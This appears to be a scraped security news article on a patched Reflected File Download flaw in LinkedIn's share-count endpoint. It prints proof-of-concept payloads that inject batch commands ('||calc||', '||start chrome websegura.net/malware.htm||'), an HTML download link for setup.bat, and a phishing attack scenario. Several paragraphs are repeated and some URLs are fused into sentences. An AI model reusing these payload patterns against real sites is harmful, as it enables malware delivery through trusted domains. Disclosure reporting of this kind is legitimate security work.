A critical Reflected File Download Vulnerability in LinkedIn was discovered by Security researcher David Sopas of WebSegura. The following XHR request on Google Inspector on LinkedIn was discovered by him:
On trying a modified parameter in the request as below,
It was possible by just changing the path so it downloaded a batch file and run a different windows command.
· Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)
· Victim clicks the link and trusting where it came from (LinkedIn) he downloads it
· Victim runs the file and his computer it’s hijacked
RFD (Reflected File Download) vulnerability is a serious flaw where a malicious file is offered for download from a trusted website, in this case LinkedIn. In spite of the file contents (virus, malware, Trojan or exploits etc.) it is downloaded and the users get compromised. Users should be extremely careful when downloading and executing files from the web. The download link might look perfectly fine and include a popular, trusted domain and use a secure connection, but users still need to be cautious not to get tricked. After the Sopas reported this vulnerability LinkedIn has patched it.
It seems a simple request made by websites to count how many shares their site have on the Linkedin network.https://www.linkedin.com/countserv/count/share?url=http://www.site_i_was_in.pt
On trying a modified parameter in the request as below,
returned the following response:https://www.linkedin.com/countserv/count/share?url=”||calc||
Obviously the url parameter wasn’t validated and it was reflected on the JSON file. The researcher was able to download the file, and by renaming it to .bat the calculator program in windows was executed.IN.Tags.Share.handleCount({“count”:0,”fCnt”:”0″,”fCntPlusOne”:”1″,”url”:”\”||calc||”});
It was possible by just changing the path so it downloaded a batch file and run a different windows command.
IE8 downloaded automatically the batch file from linkedin.com. Other browsers downloaded it using HTML5 download attribute.https://www.linkedin.com/countserv/count/share;setup.bat?url=”||start chrome websegura.net/malware.htm||
<div align="center"><a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;"><img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" />
Attack Scenario
· Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)
· Victim clicks the link and trusting where it came from (LinkedIn) he downloads it
· Victim runs the file and his computer it’s hijacked
“A malicious user could even give more credibility to the HTML5 download site if he uses famous open redirections vulnerabilities on trusted sites like open redirects on Google or even on LinkedIn.” wrote Sopas in a blog post
RFD (Reflected File Download) vulnerability is a serious flaw where a malicious file is offered for download from a trusted website, in this case LinkedIn. In spite of the file contents (virus, malware, Trojan or exploits etc.) it is downloaded and the users get compromised. Users should be extremely careful when downloading and executing files from the web. The download link might look perfectly fine and include a popular, trusted domain and use a secure connection, but users still need to be cautious not to get tricked. After the Sopas reported this vulnerability LinkedIn has patched it.
